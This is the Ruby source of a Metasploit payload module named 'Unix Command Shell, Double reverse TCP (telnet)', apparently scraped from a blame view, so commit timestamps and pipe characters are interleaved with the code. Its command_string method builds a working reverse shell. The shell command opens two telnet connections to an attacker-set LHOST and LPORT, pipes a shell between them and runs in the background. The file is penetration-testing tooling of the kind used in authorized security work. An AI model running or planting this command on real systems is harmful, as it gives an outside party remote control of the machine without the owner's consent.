2007-02-18 00:10:39 +00:00
|
|
|
##
|
2008-10-02 05:23:59 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-01-13 20:19:51 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2006-01-14 20:12:53 +00:00
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/handler/reverse_tcp_double'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
2010-02-24 01:19:59 +00:00
|
|
|
require 'msf/base/sessions/command_shell_options'
|
2006-01-14 20:12:53 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2006-01-14 20:12:53 +00:00
|
|
|
|
|
|
|
include Msf::Payload::Single
|
2010-02-24 01:19:59 +00:00
|
|
|
include Msf::Sessions::CommandShellOptions
|
2006-01-14 20:12:53 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
2009-01-02 21:21:10 +00:00
|
|
|
'Name' => 'Unix Command Shell, Double reverse TCP (telnet)',
|
2006-01-14 20:12:53 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Description' => 'Creates an interactive shell through two inbound connections',
|
|
|
|
'Author' => 'hdm',
|
2006-01-21 22:10:20 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2006-01-14 20:12:53 +00:00
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'Handler' => Msf::Handler::ReverseTcpDouble,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'cmd',
|
2010-01-13 20:19:51 +00:00
|
|
|
'RequiredCmd' => 'telnet',
|
2006-01-14 20:12:53 +00:00
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Offsets' => { },
|
|
|
|
'Payload' => ''
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return super + command_string
|
|
|
|
end
|
2010-01-13 20:19:51 +00:00
|
|
|
|
2006-01-14 20:12:53 +00:00
|
|
|
#
|
|
|
|
# Returns the command string to use for execution
|
|
|
|
#
|
|
|
|
def command_string
|
|
|
|
cmd =
|
2010-01-13 20:19:51 +00:00
|
|
|
"sh -c '(sleep #{3600+rand(1024)}|" +
|
2006-01-27 05:00:35 +00:00
|
|
|
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
|
|
|
|
"while : ; do sh && break; done 2>&1|" +
|
2006-02-05 18:10:08 +00:00
|
|
|
"telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
|
2010-01-13 20:19:51 +00:00
|
|
|
" >/dev/null 2>&1 &)'"
|
2006-01-14 20:12:53 +00:00
|
|
|
return cmd
|
|
|
|
end
|
|
|
|
|
2009-01-02 21:21:10 +00:00
|
|
|
end
|